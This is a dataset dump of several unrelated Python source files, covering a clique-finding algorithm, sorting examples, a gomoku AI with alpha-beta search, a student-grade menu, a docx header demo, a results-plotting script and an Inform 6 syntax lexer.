a colorbar for the contour lines\n# CB = plt.colorbar(CS, extend='both')\n# plt.clabel(CS, fontsize=8, inline=1)\n# plt.title('Error Bound')\n# plt.savefig('ErrorBound', dpi=900)\n# plt.show()\n\n# <codecell>\n\n# p = 2\n# dist = 2\n# theta = 0*np.pi/180\n# error = example(theta,dist,p)\n# RL = (dist - 0.5)/0.5\n# print('R/L = ',RL,'theta = ',theta*180/np.pi)\n# print('% Error Compared to Exact = ',error[0])\n# print('% Error Compared to Direct Multipole = ',error[1])\n# print('% Error Bound= ',error[2])\n\n# <codecell>\n\n\n","repo_name":"cdlrpi/fmm-rigidbodies","sub_path":"dipole-rotation/dipole-rotation-v4.py","file_name":"dipole-rotation-v4.py","file_ext":"py","file_size_in_byte":13043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"22933175217","text":"\"\"\"\nFinds all cliques in an undirected graph. A clique is a set of vertices in the\ngraph such that the subgraph is fully connected (ie. for any pair of nodes in\nthe subgraph there is an edge between them).\n\"\"\"\n\ndef find_all_cliques(edges):\n \"\"\"\n takes dict of sets\n each key is a vertex\n value is set of all edges connected to vertex\n returns list of lists (each sub list is a maximal clique)\n implementation of the basic algorithm described in:\n Bron, Coen; Kerbosch, Joep (1973), \"Algorithm 457: finding all cliques of an undirected graph\",\n \"\"\"\n\n def expand_clique(candidates, nays):\n nonlocal compsub\n if not candidates and not nays:\n nonlocal solutions\n solutions.append(compsub.copy())\n else:\n for selected in candidates.copy():\n candidates.remove(selected)\n candidates_temp = get_connected(selected, candidates)\n nays_temp = get_connected(selected, nays)\n compsub.append(selected)\n expand_clique(candidates_temp, nays_temp)\n nays.add(compsub.pop())\n\n def get_connected(vertex, old_set):\n new_set = set()\n for neighbor in edges[str(vertex)]:\n if neighbor in old_set:\n new_set.add(neighbor)\n return new_set\n\n compsub = []\n solutions = []\n possibles = set(edges.keys())\n expand_clique(possibles, set())\n return solutions\n","repo_name":"keon/algorithms","sub_path":"algorithms/graph/find_all_cliques.py","file_name":"find_all_cliques.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":23106,"dataset":"github-code","pt":"96"} +{"seq_id":"10592047115","text":"# !/usr/bin/python\r\n# -*- coding:utf-8 -*-\r\n# @author : GaiusPluto\r\n# @time : 2022/3/18 20:12\r\nfrom docx import Document\r\n# 访问节的标题\r\ndocument = Document()\r\nsection = document.sections[0]\r\nheader = section.header\r\n\r\n# 添加页眉\r\nparagraph = header.paragraphs[0]\r\nparagraph.text = \"Title of my document\"\r\nheader.is_linked_to_previous = False\r\n\r\n# 添加分区标题内容\r\nparagraph.text = \"Left Text\\tCenter Text\\tRight Text\"\r\nparagraph.style = document.styles[\"Header\"]\r\n\r\n# 移除页眉\r\nheader.is_linked_to_previous = True\r\n\r\ndocument.save(\"test_headerandfooter.docx\")\r\n","repo_name":"Plutoeat/autoDoc","sub_path":"study/docHeaderAndFooter.py","file_name":"docHeaderAndFooter.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"96"} +{"seq_id":"20801815584","text":"\ndef bubbleSort(x):\n length = len(x)-1\n for i in range(length):\n for j in range(length-i):\n if x[j] > x[j+1]:\n x[j], x[j+1] = x[j+1], x[j]\n return x\n\n\ndef bubble_sort(arr):\n for i in range(len(arr)):\n for j in range(len(arr)-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n return arr\n\n\narr = [9, 2, 5, 3, 6, 4, 8, 1, 7]\n\n\nfor front_index in range(0, len(arr) - 1):\n for index in range(front_index + 1, len(arr)):\n if arr[front_index] > arr[index]:\n arr[front_index], arr[index] = arr[index], arr[front_index]\nprint(bubbleSort(arr))\n","repo_name":"Daewony/python-algorithms","sub_path":"LG/정렬/버블정렬.py","file_name":"버블정렬.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"3544607524","text":"def outer_func():\n msg=\"String1\"\n def func1():\n nonlocal msg\n print(\"func1\", msg)\n msg=\"String2\"\n print(\"func1\", msg)\n\n def func2():\n nonlocal msg\n print(\"func2\", msg)\n msg=\"String3\"\n print(\"func2\", msg)\n\n return (func1, func2)\n\nmyfuncs = outer_func()\n\nmyfuncs[0]()\nmyfuncs[1]()\n","repo_name":"gshimansky/modin-tests","sub_path":"closure.py","file_name":"closure.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12458350237","text":"from PySide6.QtWebEngineCore import QWebEngineDownloadRequest\nfrom PySide6.QtWidgets import QWidget, QFileDialog\nfrom PySide6.QtCore import QDir, QFileInfo, Qt\n\nfrom downloadwidget import DownloadWidget\nfrom ui_downloadmanagerwidget import Ui_DownloadManagerWidget\n\n\n# Displays a list of downloads.\nclass DownloadManagerWidget(QWidget):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self._ui = Ui_DownloadManagerWidget()\n self._num_downloads = 0\n self._ui.setupUi(self)\n\n def download_requested(self, download):\n assert (download and download.state() == QWebEngineDownloadRequest.DownloadRequested)\n\n proposal_dir = download.downloadDirectory()\n proposal_name = download.downloadFileName()\n proposal = QDir(proposal_dir).filePath(proposal_name)\n path, _ = QFileDialog.getSaveFileName(self, \"Save as\", proposal)\n if not path:\n return\n\n fi = QFileInfo(path)\n download.setDownloadDirectory(fi.path())\n download.setDownloadFileName(fi.fileName())\n download.accept()\n self.add(DownloadWidget(download))\n\n self.show()\n\n def add(self, downloadWidget):\n downloadWidget.remove_clicked.connect(self.remove)\n self._ui.m_itemsLayout.insertWidget(0, downloadWidget, 0, Qt.AlignTop)\n if self._num_downloads == 0:\n self._ui.m_zeroItemsLabel.hide()\n self._num_downloads += 1\n\n def remove(self, downloadWidget):\n self._ui.m_itemsLayout.removeWidget(downloadWidget)\n downloadWidget.deleteLater()\n self._num_downloads -= 1\n if self._num_downloads == 0:\n self._ui.m_zeroItemsLabel.show()\n","repo_name":"qtproject/pyside-pyside-setup","sub_path":"examples/webenginewidgets/simplebrowser/downloadmanagerwidget.py","file_name":"downloadmanagerwidget.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"96"} +{"seq_id":"74208533754","text":"x = int(input(\"Primeiro número: \"))\ny = int(input(\"Segundo número: \"))\nz = int(input(\"Terceiro número: \"))\nmenor = x\nif y < x and y < z:\n menor = y\nif z < x and z < y:\n menor = z\n\nmaior = x\nif z > y and z > x:\n maior = z\nif z > x and z > y:\n maior = z\nprint (\"O menor número é {}\".format(menor))\nprint (\"O maior número é {}\".format(maior))","repo_name":"HeyCaroll/Python-CeV","sub_path":"exercícios/1°mundo/aula 10 - condições (Parte 1)/EX033.PY","file_name":"EX033.PY","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"17787164965","text":"import math\nimport heapq\nimport random\n\nsize = 15\n\n\ndef initial_board():\n board = {}\n for i in range(1,size+1):\n board[i] = {}\n for j in range(1,size+1):\n board[i][j] = 0\n return board\n\n\nclass State:\n \"\"\"Define state of gomoku game.\"\"\"\n\n def __init__(self, action, pre_state, action_player=2, next_player=1, has_color=True):\n \"\"\"Initialization for creating a state.\n AI is player 1 (MAX) and human player is player 2 (MIN).\n self.player is the player who is going to make next move.\n \"\"\"\n\n self.action = action\n # Initial state\n if pre_state is None:\n self.action_player = action_player\n self.player = next_player\n self.available_moves = set()\n for x in range(1, 16):\n for y in range(1, 16):\n if (x, y) != action:\n self.available_moves.add((x, y))\n self.occupied = {}\n if next_player == 1:\n self.occupied[action] = 2\n else:\n self.occupied[action] = 1\n self.top = action[0]\n self.bottom = action[0]\n self.left = action[1]\n self.right = action[1]\n global use_color\n use_color = has_color\n else:\n self.action_player = pre_state.player\n if pre_state.player == 1:\n self.player = 2\n else:\n self.player = 1\n self.available_moves = set(pre_state.available_moves)\n self.available_moves.remove(action)\n self.occupied = dict(pre_state.occupied)\n self.occupied[action] = pre_state.player\n # Set the most top, bottom, left, and right index for the state.\n if action[0] < pre_state.top:\n self.top = action[0]\n else:\n self.top = pre_state.top\n if action[0] > pre_state.bottom:\n self.bottom = action[0]\n else:\n self.bottom = pre_state.bottom\n if action[1] < pre_state.left:\n self.left = action[1]\n else:\n self.left = pre_state.left\n if action[1] > pre_state.right:\n self.right = action[1]\n else:\n self.right = pre_state.right\n self.pre_state = pre_state\n if self.action_player == 1:\n self.value = evaluate_state(self)\n else:\n self.value = -evaluate_state(self)\n\n def successors(self):\n \"\"\"Get successor states.\"\"\"\n\n if self.player == 1: # MAX HEAP\n children = []\n for (x, y) in self.available_moves:\n if (y >= self.left - 3) and (y <= self.right + 3) and (x >= self.top - 3) and (x <= self.bottom + 3):\n child = State((x, y), self)\n heap_key = -child.value-random.random()\n heapq.heappush(children, (heap_key, child))\n return children\n else: # MIN HEAP:\n children = []\n for (x, y) in self.available_moves:\n if (y >= self.left - 3) and (y <= self.right + 3) and (x >= self.top - 3) and (x <= self.bottom + 3):\n child = State((x, y), self)\n heap_key = child.value - random.random()\n heapq.heappush(children, (heap_key, child))\n return children\n\n def populate_states(self, list, player):\n \"\"\"Used for testing to generate a state.\"\"\"\n if self.pre_state is None:\n for action in list:\n self.occupied[action] = player\n self.available_moves.remove(action)\n return 1\n print(\"you can only populate at the init state\")\n return 0\n\n def __str__(self):\n \"\"\"Print the board of current state.\"\"\"\n s = \" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15\\n\"\n board = initial_board()\n count = 1\n for i in self.occupied:\n board[i[0]][i[1]] = self.occupied[i]\n space = ''\n for i in range(0, 16):\n space += ' '\n start = '---'.join(space)\n s += start+'\\n|'\n for row in range(1,16):\n for col in range(1,16):\n if use_color and (row, col) == self.action:\n s += '\\033[91m'\n if board[row][col] == 0:\n s += ' |'\n elif board[row][col] == 1:\n s += ' O |'\n else:\n s += ' X |'\n if use_color and (row, col) == self.action:\n s += '\\033[0m'\n s += '\\033[0m'\n s+=str(count)+'\\n'+start+'\\n|'\n count += 1\n\n s = s[:len(s)-1]\n s += \"\\n*****************************************************************************\"\n return s[:len(s)-1]\n\n\nclass SearchEngine:\n \"\"\" The search method to determine next step. \"\"\"\n\n def next_move(self, cur_state):\n \"\"\"Given the current state, return the best movement to next state.\n AI is always player 1, so we only need to calculate for MAX.\n \"\"\"\n\n alpha, final_state, min_level, action_took = self.alpha_beta(cur_state, 2, 0, -math.inf, math.inf, math.inf)\n #print(\"-----------------------------------------\")\n #print(\"value = \"+str(alpha)+\", min_level = \"+str(min_level))\n #print(\"previous: top=\"+str(cur_state.top)+\", bottom=\"+str(cur_state.bottom)+\", left=\"+str(cur_state.left)+\", right=\"+str(cur_state.right))\n #print(final_state.pre_state)\n return action_took\n\n def alpha_beta(self, cur_state, limit, cur_level, alpha, beta, min_level):\n \"\"\"Alpha-beta pruning with limited depth. Leaves are evaluated by evaluation function.\"\"\"\n\n # Evaluate current state.\n if cur_level == limit or get_action_score(cur_state.action[0], cur_state.action[1], cur_state.action_player, cur_state.occupied)==100:\n return cur_state.value, cur_state, cur_level, None\n else:\n child_list = cur_state.successors()\n final_state = None\n action_took = None\n if cur_state.player == 1: # MAX player\n for i in range(len(child_list)):\n c = heapq.heappop(child_list)\n (c_alpha, c_state, c_level, action) = self.alpha_beta(c[1], limit, cur_level + 1, alpha, beta, min_level)\n # print(\"HERE: \"+str(c_alpha)+\" \"+str(c_level))\n if (c_alpha > alpha) or (c_alpha == alpha and c_level < min_level):\n alpha = c_alpha\n final_state = c_state\n action_took = c[1].action\n min_level = c_level\n if beta <= alpha:\n break\n return alpha, final_state, min_level, action_took\n else: # MIN player\n for i in range(len(child_list)):\n c = heapq.heappop(child_list)\n (c_beta, c_state, c_level, action) = self.alpha_beta(c[1], limit, cur_level + 1, alpha, beta, min_level)\n # print(\"c_beta = \" + str(c_beta) + \", beta = \" + str(beta))\n if (c_beta < beta) or (c_beta == beta and c_level < min_level):\n beta = c_beta\n final_state = c_state\n action_took = c[1].action\n min_level = c_level\n if beta <= alpha:\n break\n return beta, final_state, min_level, action_took\n\n\ndef get_winner(state):\n \"\"\"If there is a winner for state, return the winner. Else if it's terminal state and no player won,\n return 0. Else return -1.\"\"\"\n state_val = get_action_score(state.action[0], state.action[1], state.action_player, state.occupied)\n if state_val == 100:\n return state.action_player\n elif len(state.available_moves) == 0:\n return 0\n else:\n return -1\n\n\ndef evaluate_state(state):\n \"\"\"Input a state, return the value of the state.\"\"\"\n\n my_score = get_action_score(state.action[0], state.action[1], state.action_player, state.occupied)\n other_score = get_action_score(state.action[0], state.action[1], state.player, state.occupied)\n \n return max(my_score, other_score)\n\n\ndef get_action_score(x, y, player, occupied):\n \"\"\"Input a state, return the value of the state.\"\"\"\n\n vertical_num = 1\n horizontal_num = 1\n diagonal_num = 1\n antidiagonal_num = 1\n\n dictionary = {}\n\n # Calculate the number of pieces in a roll on a vertical line, and how many sides are blocked.\n vertical_blocked_1 = 0\n vertical_blocked_2 = 0\n for i in range(1, min(5, x)):\n if (x - i, y) in occupied:\n if occupied[(x - i, y)] == player:\n vertical_num += 1\n if x - i ==1:\n vertical_blocked_1 =1\n else:\n vertical_blocked_1 = 1\n break\n else:\n break\n if x == 1:\n vertical_blocked_1 = 1 \n\n for i in range(1, min(5, size - x + 1)):\n if (x + i, y) in occupied:\n \n if occupied[(x + i, y)] == player:\n vertical_num += 1\n if x + i==15:\n vertical_blocked_2 = 1 \n else:\n vertical_blocked_2 = 1\n break\n else:\n break\n if x == 15:\n vertical_blocked_2 = 1 \n\n if (vertical_num, vertical_blocked_1 + vertical_blocked_2) in dictionary:\n dictionary[(vertical_num, vertical_blocked_1 + vertical_blocked_2)] += 1\n else:\n dictionary[(vertical_num, vertical_blocked_1 + vertical_blocked_2)] = 1\n\n # Calculate the number of pieces in a roll on a horizontal line, and how many sides are blocked.\n horizontal_blocked_1 = 0\n horizontal_blocked_2 = 0\n for i in range(1, min(5, y)):\n if (x, y - i) in occupied:\n if occupied[(x, y - i)] == player:\n horizontal_num += 1\n if y - i == 1:\n horizontal_blocked_1 = 1\n else:\n horizontal_blocked_1 = 1\n break\n else:\n break\n if y == 1:\n horizontal_blocked_1 = 1 \n for i in range(1, min(5, size - y + 1)):\n if (x, y + i) in occupied:\n if occupied[(x, y + i)] == player:\n horizontal_num += 1\n if y + i == 15:\n horizontal_blocked_2 = 1\n else:\n horizontal_blocked_2 = 1\n break\n else:\n break\n if y == 15:\n horizontal_blocked_1 = 1\n\n if (horizontal_num, horizontal_blocked_1 + horizontal_blocked_2) in dictionary:\n dictionary[(horizontal_num, horizontal_blocked_1 + horizontal_blocked_2)] += 1\n else:\n dictionary[(horizontal_num, horizontal_blocked_1 + horizontal_blocked_2)] = 1\n\n # Calculate the number of pieces in a roll through the diagonal, and how many sides are blocked.\n diagonal_blocked_1 = 0\n diagonal_blocked_2 = 0\n for i in range(1, min(5, x, y)):\n if (x - i, y - i) in occupied:\n if occupied[(x - i, y - i)] == player:\n diagonal_num += 1\n if x - i==1 or y-i==1:\n diagonal_blocked_1 = 1\n else:\n diagonal_blocked_1 = 1\n break\n else:\n break\n if x == 1 or y == 1:\n diagonal_blocked_1 = 1\n\n \n for i in range(1, min(5, size - x + 1, size - y + 1)):\n if (x + i, y + i) in occupied:\n if occupied[(x + i, y + i)] == player:\n diagonal_num += 1\n if x + i == 15 or y + i==15:\n diagonal_blocked_2 = 1\n else:\n diagonal_blocked_2 = 1\n break\n else:\n break\n if x == 15 or y < 15:\n diagonal_blocked_2 = 1 \n\n if (diagonal_num, diagonal_blocked_1 + diagonal_blocked_2) in dictionary:\n dictionary[(diagonal_num, diagonal_blocked_1 + diagonal_blocked_2)] += 1\n else:\n dictionary[(diagonal_num, diagonal_blocked_1 + diagonal_blocked_2)] = 1\n\n # Calculate the number of pieces in a roll through the antidiagonal, and how many sides are blocked.\n antidiagonal_blocked_1 = 0\n antidiagonal_blocked_2 = 0\n for i in range(1, min(5, size - x + 1, y)):\n if (x + i, y - i) in occupied:\n if occupied[(x + i, y - i)] == player:\n antidiagonal_num += 1\n if x + i==1 or y - i==1:\n antidiagonal_blocked_1 = 1\n else:\n antidiagonal_blocked_1 = 1\n break\n else:\n break\n if x == 1 or y == 1:\n antidiagonal_blocked_1 = 1 \n\n if x < 5 or size - y < 4:\n antidiagonal_blocked_2 = 1\n for i in range(1, min(5, x, size - y + 1)):\n if (x - i, y + i) in occupied:\n if occupied[(x - i, y + i)] == player:\n antidiagonal_num += 1\n if x - i==15 or y + i==15:\n antidiagonal_blocked_2 = 1\n else:\n antidiagonal_blocked_2 = 1\n break\n else:\n break\n if x == 15 or y == 15:\n antidiagonal_blocked_2 = 1 \n\n if (antidiagonal_num, antidiagonal_blocked_1 + antidiagonal_blocked_2) in dictionary:\n dictionary[(antidiagonal_num, antidiagonal_blocked_1 + antidiagonal_blocked_2)] += 1\n else:\n dictionary[(antidiagonal_num, antidiagonal_blocked_1 + antidiagonal_blocked_2)] = 1\n\n # Return the score\n if ((5, 0) in dictionary) or ((5, 1) in dictionary) or ((5, 2) in dictionary):\n return 100\n elif ((4, 0) in dictionary) or ((4, 1) in dictionary and dictionary[(4, 1)] > 1) or (\n (4, 1) in dictionary and (3, 0) in dictionary):\n return 90\n elif (4, 1) in dictionary:\n return 80\n elif ((3, 0) in dictionary) and (dictionary[(3, 0)] > 1):\n return 70\n elif ((3, 0) in dictionary) and ((3, 1) in dictionary):\n return 60\n elif (3, 0) in dictionary:\n return 50\n elif ((2, 0) in dictionary) and (dictionary[(2, 0)] > 1):\n return 40\n elif (3, 1) in dictionary:\n return 30\n elif (2, 0) in dictionary:\n return 20\n elif (2, 1) in dictionary:\n return 10\n else:\n return 0","repo_name":"nishikiw/Gomoku","sub_path":"gomoku.py","file_name":"gomoku.py","file_ext":"py","file_size_in_byte":14564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"33807064483","text":"ogrenciler = {}\n\n\ndef menu():\n secenek = input(\"\"\"\n 1-Öğrenci ekle\n 2-Öğrenci sil\n 3-Öğrenci görüntüle\n 4-Öğrencileri toplu şekilde sil\n 5-Çıkış\n \"\"\")\n return secenek\n\n\ndef main():\n while True:\n try:\n secenek = int(menu())\n except ValueError:\n print(\"Lütfen sayı giriniz.\")\n else:\n if secenek == 1:\n ogrenci_ekle()\n elif secenek == 2:\n ogrenci_sil()\n elif secenek == 3:\n ogrenci_goruntule()\n elif secenek == 4:\n ogrenci_reset()\n elif secenek == 5:\n break\n else:\n print(\"bilinmeyen bir komut girdiniz\")\n\n\ndef ogrenci_ekle():\n\n tmp_sayac=0\n while True:\n ogr_no = input(\"Ogrencinin numarasini giriniz.\")\n tmp_sayac += 1\n if tmp_sayac == 4:\n print(\"Deneme hakkınızı doldurdunuz.\")\n break\n if len(ogr_no) != 9:\n print(\"Ogrenci numarasi 9 haneli olmalidir\")\n continue\n ogr_vize = input(\"Vize notunu giriniz\")\n ogr_final = input(\"Final notunu giriniz\")\n ogrenciler.update({ogr_no: {'vize': ogr_vize,\n 'final': ogr_final}\n })\n break\n\n\ndef ogrenci_sil():\n silinecek_ogr_no = input(\"lütfen silinecek ogr no giriniz\")\n if silinecek_ogr_no in ogrenciler.keys():\n ogrenciler.pop(silinecek_ogr_no)\n print(\"{} numaralı öğrenci silinmiştir.\".format(silinecek_ogr_no))\n else:\n print(\"{} numaralı öğrenci bulunamadı\".format(silinecek_ogr_no))\n\n\ndef ogrenci_goruntule():\n for ogr_no, ogr_notlari in ogrenciler.items():\n print(\"\"\"ogrenci no: {}\n ogrenci vize: {}\n ogrenci final: {}\"\"\".format(ogr_no,\n ogr_notlari.get('vize'),\n ogr_notlari.get('final')))\n if len(ogrenciler.keys()) == 0:\n print(\"Listede öğrenci bulunmuyor\")\n\n\ndef ogrenci_reset():\n ogrenciler.clear()\n print(\"öğrenci listesi basarıyla temizlendi\")\n\n\nmain()","repo_name":"burhanndem/LYKampi","sub_path":"LYKampi/before_2407/funct_vizefinal.py","file_name":"funct_vizefinal.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"32587103806","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom collections import Counter\n\n\nmpl.style.use(\"seaborn\")\n\n\ndef qp(x, Q, b):\n return (0.5 * x.T @ Q @ x) + (b.T @ x)\n\n\ndef count_close(samples, obj_fn, gnd_truth, obj_params):\n num_samples = samples.shape[0]\n count = 0\n\n for sample_idx in range(num_samples):\n x = np.transpose(samples[sample_idx, :])\n\n obj = obj_fn(x, *obj_params)\n\n if np.isclose(obj, gnd_truth, atol=1e-2):\n count += 1\n\n return count\n\nDATA_DIR_QP = \"/Users/ethan/LocalResearchData/HamiltonianDescent/QHD_DATA/QP\"\n\n\nDIMS = [50, 60, 75]\nDURTNS = [\"1e2\", \"2e2\", \"3e2\", \"4e2\", \"5e2\", \"6e2\", \"7e2\", \"8e2\", \"9e2\", \"1e3\"]\nNUM_EXPS = 50\n\ndata = {}\n\nfor dim in DIMS:\n print(dim)\n data[dim] = {}\n\n data[dim][\"embedded-timed-processed\"] = {}\n for timing in DURTNS:\n data[dim][\"embedded-timed-processed\"][timing] = []\n\n data[dim][\"quantum-processed\"] = []\n\n for i in range(NUM_EXPS):\n print(f\"instance {i}\")\n inst_data_dir = DATA_DIR_QP + f\"/QP-{dim}d-5s/instance_{i}/\"\n\n # Load QP\n source = inst_data_dir + f\"instance_{i}.npy\"\n\n with open(source, \"rb\") as f:\n Q = np.load(f)\n b = np.load(f)\n Q_c = np.load(f)\n b_c = np.load(f)\n\n qp_params = [Q, b]\n\n\n # Get quadratic program optimum from Gurobi\n fopt = inst_data_dir + f\"instance_{i}_gurobi.npy\"\n\n x_opt = np.load(fopt)\n qp_optimal_obj = qp(x_opt, Q, b)\n\n\n # Compare processed timed classical embedded model samples to QP optimum\n for dur in DURTNS:\n fsamples = inst_data_dir + f\"post_timed_{dur}_sweeps_advantage6_classicaldwave_embedded_qhd_rez8_sample_{i}.npy\"\n\n samples = np.load(fsamples)\n count = count_close(samples, qp, qp_optimal_obj, qp_params)\n data[dim][\"embedded-timed-processed\"][dur].append(count / samples.shape[0])\n\n # Compare processed DWave samples to QP optimum\n fsamples = inst_data_dir + f\"post_advantage6_qhd_rez8_sample_{i}.npy\"\n\n samples = np.load(fsamples)\n count = count_close(samples, qp, qp_optimal_obj, qp_params)\n data[dim][\"quantum-processed\"].append(count / samples.shape[0])\n print()\n\n\nmedians = {}\nerrs = {}\n\nfor dim in DIMS:\n df = pd.DataFrame.from_dict(data[dim][\"embedded-timed-processed\"])\n\n medians[dim] = []\n errs[dim] = np.ndarray((2, len(DURTNS)))\n\n for col_idx in range(len(df.columns)):\n col = df.columns[col_idx]\n medians[dim].append(np.median(df[col]))\n errs[dim][:, col_idx] = np.abs(np.quantile(df[col], [0.25, 0.75]).T - medians[dim][-1])\n\n\ncmap = sns.color_palette(\"colorblind\")\n\nf, ax = plt.subplots(figsize=(90/25.4, 50/25.4), dpi=300)\n\n\nfor dim_idx in range(len(DIMS)):\n dim = DIMS[dim_idx]\n color = cmap[dim_idx]\n paired_color = tuple([(channel + 0.5*(1-channel)) for channel in color])\n plt.axhline(np.median(data[dim][\"quantum-processed\"]), color=paired_color, label=f\"DW d{dim}\", linestyle=\"--\", linewidth=1.5)\n\n plt.plot(np.arange(len(medians[dim])),\n medians[dim],\n label=f\"Rotor d{dim}\",\n color=cmap[dim_idx],\n linewidth=1.5,\n marker=\"o\", markersize=4)\n\n\n# plt.title(f\"Median Success Probability vs Dimension\")\nplt.xlabel(\"Classical Time Limit (sweeps)\", size=6)\nplt.ylabel(\"Median Success Probability\", size=6)\nplt.ylim([0, 0.15])\n\n\nplt.xticks(range(len(DURTNS)), DURTNS, size=6)\nplt.yticks(size=5)\n\nplt.legend(frameon=True, facecolor=\"white\", borderpad=0.35, prop={'size': 5})\nplt.savefig(\"./figures/DWClassicalMedians.png\", bbox_inches='tight')\nplt.savefig(\"./figures/DWClassicalMedians.eps\", bbox_inches='tight')\nplt.show()\n","repo_name":"jiaqileng/quantum-hamiltonian-descent","sub_path":"plot/fig4_legacy/fig4medians.py","file_name":"fig4medians.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"20497154312","text":"\"\"\"\nInform 6 syntax highlighting.\n\nThis is an ultra-minimal version compared to the standard Pygments Inform6\nlexer, but is much more forgiving of syntax errors. And it handles the\nexclamation-inside-string case properly.\n\"\"\"\n\nfrom pygments.lexer import RegexLexer\nfrom pygments.token import (Text, Comment, Operator, Keyword, Name,\n String, Number, Punctuation, Token)\n\nobjects = [\"Class\", \"Nearby\", \"Object\"]\n\ndirectives = [\"Abbreviate\", \"Array\", \"Attribute\", \"Btrace\", \"Class\",\n \"Constant\", \"Default\", \"Dictionary\", \"End\", \"Endif\", \"Etrace\",\n \"Extend\", \"Fake_action\", \"Global\", \"Ifdef\", \"Iffalse\",\n \"Ifndef\", \"Ifnot\", \"Iftrue\", \"Ifv3\", \"Ifv5\", \"Import\",\n \"Include\", \"Link\", \"Listsymbols\", \"Listdict\", \"Listverbs\",\n \"Lowstring\", \"Ltrace\", \"Message\", \"Nearby\", \"Nobtrace\",\n \"Noetrace\", \"Noltrace\", \"Notrace\", \"Object\", \"Property\",\n \"Release\", \"Replace\", \"Serial\", \"Statusline\", \"Stub\",\n \"Switches\", \"System_file\", \"Trace\", \"Verb\", \"Version\",\n \"Zcharacter\"]\n\ndefining = [\"[\", \"array\", \"attribute\", \"class\", \"constant\", \"fake_action\",\n \"global\", \"lowstring\", \"nearby\", \"object\", \"property\"]\n\nattributes = [\"absent\", \"animate\", \"clothing\", \"concealed\", \"container\",\n \"door\", \"edible\", \"enterable\", \"female\", \"general\", \"light\",\n \"lockable\", \"locked\", \"male\", \"moved\", \"neuter\", \"on\", \"open\",\n \"openable\", \"pluralname\", \"proper\", \"scenery\", \"scored\",\n \"static\", \"supporter\", \"switchable\", \"talkable\", \"transparent\",\n \"visited\", \"workflag\", \"worn\"]\n\nproperties = [\"n_to\", \"s_to\", \"e_to\", \"w_to\", \"ne_to\", \"se_to\", \"nw_to\",\n \"sw_to\", \"u_to\", \"d_to\", \"in_to\", \"out_to\", \"add_to_scope\",\n \"after\", \"article\", \"articles\", \"before\", \"cant_go\", \"capacity\",\n \"daemon\", \"describe\", \"description\", \"door_dir\", \"door_to\",\n \"each_turn\", \"found_in\", \"grammar\", \"initial\",\n \"inside_description\", \"invent\", \"life\", \"list_together\",\n \"name\", \"number\", \"orders\", \"parse_name\", \"plural\",\n \"react_after\", \"react_before\", \"short_name\", \"short_name_indef\",\n \"time_left\", \"time_out\", \"when_closed\", \"when_open\", \"when_on\",\n \"when_off\", \"with_key\"]\n\nextension_properties = [\"pname\"]\n\nkeywords = [\"box\", \"break\", \"continue\", \"do\", \"else\", \"font\",\n \"for\", \"give\", \"has\", \"hasnt\", \"if\", \"in\", \"inversion\", \"jump\",\n \"move\", \"new_line\", \"notin\", \"objectloop\", \"ofclass\", \"or\",\n \"print\", \"print_ret\", \"provides\", \"quit\", \"read\", \"remove\",\n \"restore\", \"return\", \"rfalse\", \"rtrue\", \"save\", \"spaces\",\n \"string\", \"style bold\", \"style fixed\", \"style reverse\",\n \"style roman\", \"style underline\", \"switch\", \"to\", \"until\",\n \"while\", \"with\"]\n\nconstants = [\"false\", \"true\"]\n\ndef wordlist(list):\n return \"(\" + \"|\".join(list) + r\")\\b\"\n\nclass InformLexer(RegexLexer):\n \"\"\"\n Inform code lexer.\n \"\"\"\n\n name = 'Inform 6'\n aliases = ['inform', 'inform6', 'i6']\n filenames = ['*.inf']\n mimetypes = ['text/x-inform', 'application/x-inform']\n\n tokens = {\n 'root': [\n (r'\"', String.Double, 'string-double'),\n (r\"'\", String.Single, 'string-single'),\n (r\"\\[ *\", Text, 'function-name'),\n\n (r'\\n', Text),\n (r'[^\\S\\n]+', Text),\n (r'!.*$', Comment.Single),\n (r'\\\\\\n', Text),\n (r'\\\\', Text),\n (r'=', Operator),\n (r\"[A-Za-z_,]+:\", Name.Label),\n (r\"<.+?>\", Name.Label),\n\n (wordlist(objects), Name.Class),\n (wordlist(keywords), Token.Keyword.Reserved),\n (wordlist(properties), Name.Builtin),\n (wordlist(directives), Name.Entity),\n (wordlist(attributes), Name.Attribute),\n (wordlist(constants), Name.Constant),\n\n (wordlist(extension_properties), Name.Builtin),\n\n (r'[a-zA-Z_][a-zA-Z0-9_.]*', Name),\n (r'(\\d+\\.?\\d*|\\d*\\.\\d+)([eE][+-]?[0-9]+)?', Number.Float),\n (r'\\d+', Number.Integer),\n\n (r'.', Punctuation),\n ],\n\n 'function-name': [\n (r\"[ ;]\", Text, '#pop'),\n (r\".\", Name.Function),\n ],\n\n 'string-double': [\n (r'\"', String.Double, '#pop'),\n (r'.', String.Double),\n (r'\\n', String.Double),\n ],\n\n 'string-single': [\n (r\"'\", String.Single, '#pop'),\n (r'.', String.Single),\n ],\n }\n","repo_name":"i6/ibg","sub_path":"tools/inform.py","file_name":"inform.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} 